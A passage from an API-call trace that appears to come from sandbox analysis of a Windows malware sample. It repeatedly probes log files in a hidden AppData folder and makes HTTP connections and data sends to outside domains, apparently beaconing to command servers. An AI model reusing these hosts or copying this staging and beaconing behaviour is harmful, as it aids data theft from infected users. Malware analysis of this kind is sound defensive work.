ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.386] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0215.386] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.386] socket (af=2, type=1, protocol=6) returned 0xb14 [0215.387] getaddrinfo (in: pNodeName="www.somnambulantfarms.com", pServiceName="80", pHints=0x6f0b418*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b448 | out: ppResult=0x6f0b448*=0x3eb41d0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f35dc0*(sa_family=2, sin_port=0x50, sin_addr="216.239.38.21"), ai_next=0x3eb4590*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f35ea0*(sa_family=2, sin_port=0x50, sin_addr="216.239.36.21"), ai_next=0x3eb1610*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f35da0*(sa_family=2, sin_port=0x50, sin_addr="216.239.34.21"), ai_next=0x3eb4010*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f36160*(sa_family=2, sin_port=0x50, sin_addr="216.239.32.21"), ai_next=0x0))))) returned 0 [0215.475] connect (s=0xb14, name=0x3f35dc0*(sa_family=2, sin_port=0x50, sin_addr="216.239.38.21"), namelen=16) returned 0 [0215.499] send (s=0xb14, buf=0x25a505a*, len=177, flags=0) returned 177 [0215.499] setsockopt (s=0xb14, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0215.499] recv (in: s=0xb14, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 2847 [0215.587] closesocket (s=0xb14) returned 0 [0215.587] Sleep (dwMilliseconds=0x7d0) [0215.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.595] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.595] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0215.596] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.596] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.596] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.596] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.596] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.596] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.597] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.597] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.597] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.598] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.598] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.598] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.598] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.598] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.598] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0215.598] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.598] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0215.598] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0215.598] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0215.598] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0215.598] Sleep (dwMilliseconds=0x7d0) [0215.611] Sleep (dwMilliseconds=0x7d0) [0215.627] Sleep (dwMilliseconds=0x7d0) [0215.642] Sleep (dwMilliseconds=0x7d0) [0215.662] Sleep (dwMilliseconds=0x7d0) [0215.673] Sleep (dwMilliseconds=0x7d0) [0215.690] Sleep (dwMilliseconds=0x7d0) [0215.758] Sleep (dwMilliseconds=0x7d0) [0215.767] Sleep (dwMilliseconds=0x7d0) [0215.784] Sleep (dwMilliseconds=0x7d0) [0215.799] Sleep (dwMilliseconds=0x7d0) [0215.818] Sleep (dwMilliseconds=0x7d0) [0215.829] Sleep (dwMilliseconds=0x7d0) [0215.845] socket (af=2, type=1, protocol=6) returned 0xb14 [0215.845] getaddrinfo (in: pNodeName="www.interfaceprosthetics.com", pServiceName="80", pHints=0x6f0b7b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0b7e8 | out: ppResult=0x6f0b7e8*=0x0) returned 11002 [0223.625] Sleep (dwMilliseconds=0x7d0) [0223.629] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.630] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.630] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0223.630] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.630] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.630] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.631] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.631] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.631] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.631] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.631] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.631] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.631] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.631] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.631] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.631] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, 